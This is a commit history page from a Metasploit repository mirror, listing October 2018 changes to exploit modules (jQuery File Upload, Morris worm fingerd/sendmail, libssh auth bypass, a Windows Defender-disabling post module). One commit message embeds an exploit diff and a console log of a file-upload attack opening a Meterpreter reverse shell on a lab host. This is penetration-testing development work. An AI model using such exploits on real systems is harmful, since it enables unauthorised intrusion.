adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
55,054 Commits 27 Branches 1,043 Tags
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
Commit Graph

27999 Commits

Author SHA1 Message Date
Brendan Coles 0b37e29c9a Update modules/exploits/windows/imap/mercury_login.rb 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
 2018-10-23 14:32:38 +02:00
Brendan Coles 43dd23042b Update modules/exploits/windows/imap/mercury_login.rb 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
 2018-10-23 14:32:10 +02:00
William Vu bdf2d44415 Augment check with Apache Server header 2018-10-23 07:04:14 -05:00
William Vu 0249f1a4af Improve check method and refactor 2018-10-23 06:20:31 -05:00
Ivan Racic ee3c663baf Upgraded exploit to work on any Windows target 
In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.

Also, upgraded to modern exploit module requirements.
 2018-10-23 12:11:56 +02:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links 
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
 2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure 
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
 2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods 
And also check upload response.
 2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request 
This ensures we don't block on execution.
 2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00
Green-m c0e8d09802 Add disclosure date. 2018-10-23 09:44:36 +08:00
Spencer McIntyre 15e67de8fc Add the EMBED option for play_youtube.rb 2018-10-22 19:51:41 -04:00
William Vu 3ca309423a Add check method to detect 4.3BSD fingerd 2018-10-22 18:32:37 -05:00
William Vu 8459aad215 Prefer aobleq over incl/cmpl/bleq in payload 2018-10-22 18:32:37 -05:00
William Vu 01d11e71db Add Space, BadChars, Encoder, and DisableNops 2018-10-22 18:32:37 -05:00
William Vu fa892d8eba Add Morris worm fingerd stack buffer overflow 2018-10-22 18:32:37 -05:00
William Vu 8f2df4864c Add 4.3BSD VAX reverse command shell payload 2018-10-22 18:32:37 -05:00
Jeffrey Martin 380aaf7889 bump payloads gem 2018-10-22 18:20:45 -05:00
William Vu e6bbc6dbd6 Land #10845, glassfish_traversal typo fix 2018-10-22 15:32:14 -05:00
pasta 8d9bd33222 new version using Metasm 2018-10-22 16:36:04 -03:00
blue-bird1 6125ef06ad fix small typo 2018-10-23 00:01:13 +08:00
Green-m 4711d6ba08 Move post module persistenct service to exploit. 2018-10-22 18:07:40 +08:00
Luisco100 74683ce951 Add Windows Post Module to disable Windows Defender signatures 2018-10-21 12:07:54 -05:00
William Vu 58a6c4137d Add a better timeout than expect can provide 2018-10-20 13:56:37 -05:00
William Vu a965abaf36 Add full payload support by setting $PATH 2018-10-20 13:56:33 -05:00
William Vu 60c4b87ad1 Prefer expect over sleeping between writes 2018-10-20 13:15:15 -05:00
William Vu ad6f15c8ca Add Morris worm sendmail debug mode exploit 2018-10-20 13:15:01 -05:00
Brendan Coles 7a36056713 Move exploit/qnx/qconn_exec to exploit/qnx/qconn/qconn_exec 2018-10-20 18:16:59 +00:00
William Vu aae74472d2 Land #10817, QNX qconn module rename 2018-10-20 03:10:22 -05:00
Brent Cook accf9edf89 Land #10835, libssh fingerprint improvements 2018-10-19 19:48:23 -05:00
bwatters-r7 47353553e5 Get everything together finally (still needs cleanup) 2018-10-19 18:15:44 -05:00
bwatters-r7 a6be9e573f Should have saved the actual file... 2018-10-19 16:30:21 -05:00
bwatters-r7 eeec3c115e This is as far as I can take it for an exploit module 
but it still does not work.  Commiting for posterity.
 2018-10-19 16:12:47 -05:00
William Vu abd425c863 Land #10819, os_name population for ssh_login* 2018-10-19 15:53:38 -05:00
William Vu db7bd3d50c Update style 2018-10-19 15:52:26 -05:00
William Vu 2a1dec45ed Land #10832, TARGETURI for tomcat_utf8_traversal 2018-10-19 15:47:37 -05:00
William Vu e4c71265fb Improve banner checking in libssh_auth_bypass 
Now we do the right thing when libssh is patched.
 2018-10-19 15:21:12 -05:00
pasta 3a02e9e80f First release, messagebox payload for x64 2018-10-19 16:39:41 -03:00
Spencer McIntyre 65d26d3a1e Use the DISPLAY environment variable when available 2018-10-19 14:35:35 -04:00
William Vu 21397330f8 Refactor fortinet_backdoor copypasta 2018-10-19 00:07:18 -05:00
William Vu 863ab3447f Add libssh auth bypass module 2018-10-18 23:03:23 -05:00
Wei Chen 3cee96d8ed Land #10664, add Windows SetImeInfoEx Win32k NULL Pointer Dereference 2018-10-18 14:42:14 -05:00
Wei Chen fac05db154 Update rescue statement 2018-10-18 14:30:20 -05:00